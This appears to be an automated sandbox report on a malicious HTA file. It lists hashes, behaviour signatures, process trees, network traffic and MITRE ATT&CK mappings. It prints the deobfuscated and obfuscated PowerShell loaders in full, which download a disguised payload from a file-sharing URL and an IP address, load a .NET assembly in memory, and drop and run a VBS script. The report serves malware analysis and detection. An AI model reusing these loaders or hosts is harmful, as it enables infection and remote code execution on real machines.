ff98902753abefb76884fc6fa5fa34f389b215ad9a447bf434624f097f12ad57

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12/11/2024, 09:42 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta
Size

207KB
MD5

a9cf15c4f82d5c26f48f4a16dfe7bd1a
SHA1

f7f0b669264b0a42b290cb5476e21ffa51eebf34
SHA256

ff98902753abefb76884fc6fa5fa34f389b215ad9a447bf434624f097f12ad57
SHA512

5a5f5e6d18a776646328ce85e59f12424f1fb8c2612d1299db7bc378177be369bb6e391488b02d40a682c37857bcf0576d415534c5aba4796f46c39ea5b21d2c
SSDEEP

48:4FhWsTR/F7gNqXfkz0eZC0yZhboWWCRzESPUJ0cv5p299DdCf+xuj9AoapwSI0t7:43F97AIyCRRtnu4fAf+cZAoaDna8YQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

# powershell snippet 0

invoke-expression "$imageUrl = 'https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.DEDDEWES/55/291.871.64.891//:ptth', 'desativado', 'desativado', 'desativado', 'CasPol', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"

# powershell snippet 1

$imageurl = "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f "

$webclient = new-object system.net.webclient

$imagebytes = $webclient.downloaddata("https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ")

$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)

$startflag = "<<BASE64_START>>"

$endflag = "<<BASE64_END>>"

$startindex = $imagetext.indexof("<<BASE64_START>>")

$endindex = $imagetext.indexof("<<BASE64_END>>")

$startindex -ge 0 -and $endindex -gt $startindex

$startindex = $startflag.length

$base64length = $endindex - $startindex

$base64command = $imagetext.substring($startindex, $base64length)

$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]

$commandbytes = [system.convert]::frombase64string($base64reversed)

$loadedassembly = [system.reflection.assembly]::load($commandbytes)

$vaimethod = ([dnlib.io.home]).getmethod("VAI")

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2332	PoWeRsHELL.EXE
6	2932	powershell.exe
7	2932	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2972	powershell.exe
2932	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2332	PoWeRsHELL.EXE
2812	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWeRsHELL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2332	PoWeRsHELL.EXE
2812	powershell.exe
2332	PoWeRsHELL.EXE
2332	PoWeRsHELL.EXE
2972	powershell.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2332	PoWeRsHELL.EXE
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 2332	2452	mshta.exe	30
PID 2452 wrote to memory of 2332	2452	mshta.exe	30
PID 2452 wrote to memory of 2332	2452	mshta.exe	30
PID 2452 wrote to memory of 2332	2452	mshta.exe	30
PID 2332 wrote to memory of 2812	2332	PoWeRsHELL.EXE	32
PID 2332 wrote to memory of 2812	2332	PoWeRsHELL.EXE	32
PID 2332 wrote to memory of 2812	2332	PoWeRsHELL.EXE	32
PID 2332 wrote to memory of 2812	2332	PoWeRsHELL.EXE	32
PID 2332 wrote to memory of 2356	2332	PoWeRsHELL.EXE	33
PID 2332 wrote to memory of 2356	2332	PoWeRsHELL.EXE	33
PID 2332 wrote to memory of 2356	2332	PoWeRsHELL.EXE	33
PID 2332 wrote to memory of 2356	2332	PoWeRsHELL.EXE	33
PID 2356 wrote to memory of 2252	2356	csc.exe	34
PID 2356 wrote to memory of 2252	2356	csc.exe	34
PID 2356 wrote to memory of 2252	2356	csc.exe	34
PID 2356 wrote to memory of 2252	2356	csc.exe	34
PID 2332 wrote to memory of 380	2332	PoWeRsHELL.EXE	37
PID 2332 wrote to memory of 380	2332	PoWeRsHELL.EXE	37
PID 2332 wrote to memory of 380	2332	PoWeRsHELL.EXE	37
PID 2332 wrote to memory of 380	2332	PoWeRsHELL.EXE	37
PID 380 wrote to memory of 2972	380	WScript.exe	38
PID 380 wrote to memory of 2972	380	WScript.exe	38
PID 380 wrote to memory of 2972	380	WScript.exe	38
PID 380 wrote to memory of 2972	380	WScript.exe	38
PID 2972 wrote to memory of 2932	2972	powershell.exe	40
PID 2972 wrote to memory of 2932	2972	powershell.exe	40
PID 2972 wrote to memory of 2932	2972	powershell.exe	40
PID 2972 wrote to memory of 2932	2972	powershell.exe	40

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE
  "C:\Windows\SysTEm32\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE" "PoWerSheLl.exE -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT ; Iex($(iEX('[sYSTEm.teXt.EncOdInG]'+[Char]58+[CHar]58+'utf8.gEtSTRIng([sYsTeM.CoNVERt]'+[chAr]0X3a+[ChAR]0x3a+'fROmbaSe64StrInG('+[Char]0X22+'JHhPVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJEZUZpTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFU1RuY2xIQkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUVlLeFpVVHBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4WnhmeGlKLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXVlpTdlp6Q2p4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtFV09RcFNsZlRkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicnFDcFB6RkpybUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhPVzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTkyLzU1L3NlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycndlYXRmb3IudElGIiwiJGVOVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycncudmJTIiwwLDApO1NUQVJULVNMZWVQKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NvbnRoZXBhcnRvZndvcmxkd2hpY2hncnJ3LnZiUyI='+[chAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbtmydie.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC218.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC207.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2252
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemebestthingsonthepartofworldwhichgrrw.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZFcmJvc2VQckVGZXJFTkNFLlRvU1RSSW5nKClbMSwzXSsnWCctSm9pTicnKSgoKCdJY3BpbWFnZVVybCA9IE9BSWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2QnKyc5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgT0FJO0ljcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SWNwaW1hZ2VCeXRlcyA9IEljcHdlYkNsaWVudCcrJy5Eb3dubG9hZERhdGEoSWNwaW1hZ2VVcmwpO0ljcGltYScrJ2dlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjguR2V0U3RyaW5nKEljcGltYWdlQnl0ZXMpO0ljcHN0YXJ0RmxhZyA9IE9BSTw8QkFTRTY0X1NUQVJUPj5PQUk7SWNwZW5kRmxhZyA9IE9BSTw8QkFTRTY0X0VORD4+T0FJO0ljcHN0YXJ0SW4nKydkZXggPSBJY3BpbWFnZVRleHQuSW5kZXhPZihJY3BzdGFydEZsYWcpO0ljcGVuZEluZGV4ID0gJysnSWNwaW1hZ2VUZXh0LkluZGV4T2YoSWNwZW5kRmxhZyknKyc7SWNwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIEljcGVuZEluZGV4IC1ndCBJY3BzdGFydEluZGV4O0ljcHN0YXJ0SW5kZXggKz0gSWNwc3RhcnRGbGFnLkxlbicrJ2d0aDtJY3BiYXNlNjRMZW5ndGggPSBJY3BlbmRJbmRleCAtIEljcHN0YScrJ3J0SW4nKydkZXg7SWNwYmEnKydzZTY0Q29tbWFuZCA9IEljcGltYWdlVGV4dC5TdWJzdHJpbmcoSWNwc3RhcnRJbmRleCwgSWNwYmFzZTY0TGVuZ3RoKTtJY3BiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChJY3BiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMTR1IEZvckVhY2gtTycrJ2JqZWN0IHsgSWNwXyB9KVstMScrJy4uLShJY3BiYXNlNjRDb21tYW5kLkxlbicrJ2d0aCldO0ljcGNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSWNwYmFzZTYnKyc0UmV2ZXJzZWQpO0ljcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChJY3AnKydjb21tYW5kQnl0ZXMpO0ljJysncHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoT0FJVkFJT0FJKTtJY3B2JysnYWlNZXRobycrJ2QuSW52b2tlKEljcG51bGwsIEAnKycoTycrJ0FJdHh0LkRFRERFV0VTLzU1LzI5MS44NzEuNjQuODkxLy86cHR0aE9BSSwnKycgT0FJZGUnKydzYXRpdmFkb09BSSwgT0FJZGVzYXRpdmEnKydkb09BSSwgT0FJZGVzYXRpdmFkb09BSSwgT0FJQ2EnKydzUG9sT0FJLCAnKydPQUlkZXNhdGl2YWRvT0FJLCBPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUkxT0FJLE9BSWRlc2F0aXZhZG9PQUkpKTsnKSAtUmVwTEFjRSAoW0NoYVJdNDkrW0NoYVJdNTIrW0NoYVJdMTE3KSxbQ2hhUl0xMjQgIC1jcmVwbEFDRSdPQUknLFtDaGFSXTM5IC1jcmVwbEFDRShbQ2hhUl03MytbQ2hhUl05OStbQ2hhUl0xMTIpLFtDaGFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $vErbosePrEFerENCE.ToSTRIng()[1,3]+'X'-JoiN'')((('IcpimageUrl = OAIhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd'+'9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OAI;IcpwebClient = New-Object System.Net.WebClient;IcpimageBytes = IcpwebClient'+'.DownloadData(IcpimageUrl);Icpima'+'geText = [System.Text.Encoding]::UT'+'F8.GetString(IcpimageBytes);IcpstartFlag = OAI<<BASE64_START>>OAI;IcpendFlag = OAI<<BASE64_END>>OAI;IcpstartIn'+'dex = IcpimageText.IndexOf(IcpstartFlag);IcpendIndex = '+'IcpimageText.IndexOf(IcpendFlag)'+';IcpstartIndex -ge 0 -and IcpendIndex -gt IcpstartIndex;IcpstartIndex += IcpstartFlag.Len'+'gth;Icpbase64Length = IcpendIndex - Icpsta'+'rtIn'+'dex;Icpba'+'se64Command = IcpimageText.Substring(IcpstartIndex, Icpbase64Length);Icpbase64Reversed = -join (Icpbase64Command.ToCharArray() 14u ForEach-O'+'bject { Icp_ })[-1'+'..-(Icpbase64Command.Len'+'gth)];IcpcommandBytes = [Syst'+'em.Convert]::FromBase64String(Icpbase6'+'4Reversed);IcploadedAssembly = [System.Reflection.Assembly]::Load(Icp'+'commandBytes);Ic'+'pvaiMethod = [dnlib.IO.Home].GetMethod(OAIVAIOAI);Icpv'+'aiMetho'+'d.Invoke(Icpnull, @'+'(O'+'AItxt.DEDDEWES/55/291.871.64.891//:ptthOAI,'+' OAIde'+'sativadoOAI, OAIdesativa'+'doOAI, OAIdesativadoOAI, OAICa'+'sPolOAI, '+'OAIdesativadoOAI, OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAI1OAI,OAIdesativadoOAI));') -RepLAcE ([ChaR]49+[ChaR]52+[ChaR]117),[ChaR]124 -creplACE'OAI',[ChaR]39 -creplACE([ChaR]73+[ChaR]99+[ChaR]112),[ChaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932

Network

GET

http://198.46.178.192/55/seemebestthingsonthepartofworldwhichgrrweatfor.tIF

PoWeRsHELL.EXE

Remote address:

198.46.178.192:80

Request

GET /55/seemebestthingsonthepartofworldwhichgrrweatfor.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 198.46.178.192
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 12 Nov 2024 09:42:53 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 12 Nov 2024 06:36:55 GMT
ETag: "22e32-626b17183e5d2"
Accept-Ranges: bytes
Content-Length: 142898
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
DNS

1017.filemail.com

powershell.exe

Remote address:

8.8.8.8:53

Request

1017.filemail.com

IN A

Response

1017.filemail.com

IN CNAME

ip.1017.filemail.com

ip.1017.filemail.com

IN A

142.215.209.78

198.46.178.192:80

http://198.46.178.192/55/seemebestthingsonthepartofworldwhichgrrweatfor.tIF

http

PoWeRsHELL.EXE

3.1kB
147.5kB
60
107

HTTP Request

GET http://198.46.178.192/55/seemebestthingsonthepartofworldwhichgrrweatfor.tIF

HTTP Response

200
142.215.209.78:443

1017.filemail.com

tls

powershell.exe

259 B
92 B
3
2
142.215.209.78:443

1017.filemail.com

tls

powershell.exe

259 B
92 B
3
2

8.8.8.8:53

1017.filemail.com

dns

powershell.exe

63 B
96 B
1
1

DNS Request

1017.filemail.com

DNS Response

142.215.209.78

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC218.tmp

Filesize
1KB

MD5
e347548b621699cae3388a80c6bbfc3b

SHA1
815ee0defba2a0fcc1b9fbeed2984b6fa5d799c9

SHA256
4e8b514e553ac348a393dd8289dd4eee096694d8ff4fc713d993208cdde95750

SHA512
653fd59a72278ed45e5ff9af06856ced59e30c251ea846dc256c63a08977d8e1bcf043287a2fed690d03960ec45dd5c0cd43a0b7cbfc150ad281f6ff2b5d9ade

Download Submit
C:\Users\Admin\AppData\Local\Temp\sbtmydie.dll

Filesize
3KB

MD5
8b21fefd34310a79ae7991917dac41f9

SHA1
383e225545073092995bd1989b4f334121a46271

SHA256
4ddb75095f13cd22778b15572946892d35950b643e599bd75600a9b03929ccc5

SHA512
8c6d050d5908d04684c4914edf99c4f70701ebb7c797ff262b6bb451985e67f6dbb6b802f49be081b0b85f4c6d0f61c43aae4f0b912875b5273dd861f781ead6

Download Submit
C:\Users\Admin\AppData\Local\Temp\sbtmydie.pdb

Filesize
7KB

MD5
91e3b021ebefdf218f2bacb0097b34da

SHA1
e0b58da1d8368edd295b3d9454b52a65681003b0

SHA256
04529076dd23f8d909be01a6870f86fd6f09f86e8b141cf7bebd4f1ca6c03326

SHA512
655f3cfd63cd5d19ccb0d1d77097a02c02db338e097dc743204087ea4059502a90e65f919db17bda08bfe17b2678682f5108ab91ed88c13202334b415250dbd8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a16748c5faca50d1c2be7d2352c0c280

SHA1
05ec767462ef6c5877d149c6a0616a4e22e26fe4

SHA256
707a511ee2019d8d86210ad34cc9da3ca208ad9c2baf5ad2c7174e8e57161ea5

SHA512
89c054d3fa68b28450fac2c3787ab9860f7b8142d117347c7df86203ab8fd6136438685049fdfd9514ba906cd7588b4b354de6df97daa2f2009985331b2b465a

Download Submit
C:\Users\Admin\AppData\Roaming\seemebestthingsonthepartofworldwhichgrrw.vbS

Filesize
139KB

MD5
1860dcae987d5ed903d93a6cfc698eaf

SHA1
aaee36eb86bd7c80fd0ae9328bea5650f8c74d12

SHA256
d72fec7ef303edc51d89e59e92743962f4f742d4678f4d01cafb1a110741efb3

SHA512
73befb8642d5c9828c6d67bcbcb4b6128410c07e2abbef7ae65a3fa4fc067ee50e7c9c81cf1e2f2b56ddd8cbfa94f20bf56ce3e8848d7a9403a14c8de6d22742

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC207.tmp

Filesize
652B

MD5
fc49e3199ba37d30b0091dd23fd34420

SHA1
d1f92958080d189db29850a01dc950106becb6c1

SHA256
0127bb70d4521025b9f94d2472eb603803c45aef53f0b0f2a7e9aea841c94b85

SHA512
7e059c423d1076e03622f145db3e3cbf470209e152359663345a0c6b447e5b429f90ca7cbbee6fd31056de61c0be63f133654885bf5a54b7573cd2ffdd2a0e3b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sbtmydie.0.cs

Filesize
496B

MD5
f8f40cf06d8b2ceb49d38fdf52e8ecc0

SHA1
1ff0676c6503f21f4899ba1cbc30351318403804

SHA256
39f96499c4e911bc620f0facad68dab4452781beb339326f5910c5caea5714a2

SHA512
020e05dd5bd89e587dfa492086e433ea0620fb58ead54c1325a527ba8d1bf7251faa66116b69b4a802e4f2994215de1b146fd2df6f9347470e280bf7a22a7857

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sbtmydie.cmdline

Filesize
309B

MD5
77048e1b58b9f37c3a9ae9f64f03da6f

SHA1
1590cce3f7a1a27fdf47a70256239660e7a1f4f7

SHA256
613b0f66bad49ef5ef576ff040585e7d0fb7cba3b887c62779e064fcff1d1412

SHA512
952fdad000b6a48fe85cd0f053428f196a14788bbfc8bd85bdb63a93218a0f54a9215b2a183e3a296567ce722dba844c2bf7a040e2be330bee8d44f4dcd386bc

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.